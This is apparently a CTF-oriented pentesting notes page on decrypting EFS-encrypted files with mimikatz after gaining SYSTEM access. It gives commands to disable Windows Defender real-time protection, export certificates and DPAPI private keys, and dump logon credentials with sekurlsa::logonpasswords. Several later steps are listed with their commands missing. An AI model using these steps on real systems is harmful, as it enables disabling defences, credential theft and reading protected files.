search
githubEdit

Decrypt EFS encrypted files with mimikatz

hashtag
Decrypt EFS encrypted files with mimikatz

hashtag
Requirements: System/root level access

hashtag
Example: We have a root flag that we can't read even as the SYSTEM user. We do the steps below:

1) It will show you which users can decrypt the file, as well as the certificate thumbprint to export it to a .der file with mimikatz later

cipher /c root.txt

2) Disable AV to safely download mimikatz to victim machine

powershell set-mppreference -disablerealtimemonitoring $true

3) Transfer mimikatz.exe to the machine

4)

./mimikatz.exe

5)

privilege::debug

6) Obtains and exports the public key to a .der file.

crypto::system /file:"C:\Users\USER\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\CERTIFICATE_STRING /export

7) Verify that the private key is located in this container Hint: the pUnique name is the same as earlier container name.

dpapi::capi /in:"C:\Users\USER\AppData\Roaming\Microsoft\Crypto\RSA\USER_SID\RANDOM_NUMBERS"

8) HINT: We can also use the SHA1 hash to decrypt the masterkey. We can dump the SHA1 of the user with sekurlsa::logonpasswords command.

9) Obtains the private key

10) Transfer the .der and the .pvk files to attacking machine with the method of your choice

11) Attacking machine:

12) Attacking machine:

13) Generate a certificate .pfx file by using the public and private .pem files we previously generated from the files extracted by mimikatz

14) Transfer the cert.pfx file to the machine

15) Victim machine:

16) Now we can finally read the root flag :p

PreviousDPAPI Domain Backup KeyNextFileZilla Credentials

Last updated